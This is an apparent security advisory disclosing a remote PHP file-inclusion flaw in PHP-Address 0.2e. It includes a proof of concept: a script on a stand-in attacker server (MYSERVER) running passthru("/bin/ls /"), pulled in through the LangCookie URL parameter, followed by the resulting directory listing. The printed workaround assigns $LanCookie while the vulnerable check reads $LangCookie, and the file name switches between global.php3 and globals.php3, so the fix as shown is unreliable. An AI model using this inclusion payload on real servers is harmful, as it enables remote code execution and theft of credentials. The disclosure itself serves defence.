PHP source injection in PHPAddress Description PHP-Address is a collection of PHP3-Scripts (works on PHP4 too) for maintaing a small web-based address-database. It can be found at http://phpaddress.huebsch-gemacht.de/ Workaround Change the global.php3 file so it looks like this: <?php # (c) Copyright in 2000, 2001 by Chris Huebsch (chu@informatik.tu-chemnitz.de) $LanCookie = ""; // THIS LINE if ($LangCookie) require("$LangCookie.php3"); // Line 5 ... Tested version PHP Address 0.2e (09.12.2001) The Problem Any user who requests an url like "http://SERVER/globals.php3?LangCookie=INCLUDE_FILE"; is able to include any file he wants. Example I putted a PHP script on my server wich I wanted to include: ------------x.php3------------ <? passthru("/bin/ls /"); ?> ------------------------------- then i requested this url: http://SERVER/globals.php3?LangCookie=http://MYSERVER/x (the .php3 is allready there look at line 5 in global.php3) ------------output------------ bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp usr var ------------------------------ Note that any PHP code could be included, malicious users could get access to database passwords, personal information, ... ------------------------------ Tim Vandermeersch Tim.Vandermeersch@pandora.be
